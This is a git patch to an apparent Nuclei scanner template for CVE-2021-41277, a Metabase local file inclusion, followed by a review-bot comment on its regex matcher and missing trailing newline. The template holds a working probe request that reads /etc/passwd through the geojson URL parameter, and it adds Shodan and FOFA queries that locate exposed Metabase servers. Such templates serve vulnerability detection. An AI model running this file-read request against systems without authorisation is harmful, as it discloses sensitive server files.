From a175effdc4e27c473a1575d5933fe80688b84689 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Sat, 20 Nov 2021 17:19:24 +0530
Subject: [PATCH] Added few additional information
---
 .../2021/CVE-2021-41277.yaml | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)
 rename CVE-2021-41277.yaml => cves/2021/CVE-2021-41277.yaml (81%)
diff --git a/CVE-2021-41277.yaml b/cves/2021/CVE-2021-41277.yaml
similarity index 81%
rename from CVE-2021-41277.yaml
rename to cves/2021/CVE-2021-41277.yaml
index 7638b2d8e1..d47d490eac 100644
--- a/CVE-2021-41277.yaml
+++ b/cves/2021/CVE-2021-41277.yaml
@@ -1,12 +1,17 @@
 id: CVE-2021-41277
+
 info:
 name: Metabase Local File Inclusion
 author: 0x_Akoko
 severity: critical
 description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
 reference:
- - https://twitter.com/90security/status/1461923313819832324
+ - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
 - https://nvd.nist.gov/vuln/detail/CVE-2021-41277
+ - https://twitter.com/90security/status/1461923313819832324
+ metadata:
+ shodan-query: http.title:"Metabase"
+ fofa-query: app="Metabase"
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
 cvss-score: 10.0
@@ -17,15 +22,15 @@ info: requests: - method: GET path: - - "{{BaseURL}}/api/geojson?url=file:/etc/passwd" + - "{{BaseURL}}/api/geojson?url=file:///etc/passwd" matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0:" - type: status status: - - 200 + - 200 \ No newline at end of file
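Review bot: The new pattern `root:.*:0:0:` in the regex matcher is looser than the check needs, because `.*` is greedy and runs across field separators, so any single line of a 200 response that contains `root:` and later `:0:0:` satisfies it. For a template rated critical that raises the false-positive risk; bounding the second field, for example `- "root:[^:]*:0:0:"`, should keep the wider coverage this change appears to be after while staying inside one passwd field. The new side also ends without a trailing newline (`\ No newline at end of file` after `- 200`), which yamllint flags and which makes the next edit to this file show a spurious changed line. The `requests` block starts above the hunk, so other matchers or options there are not visible from here.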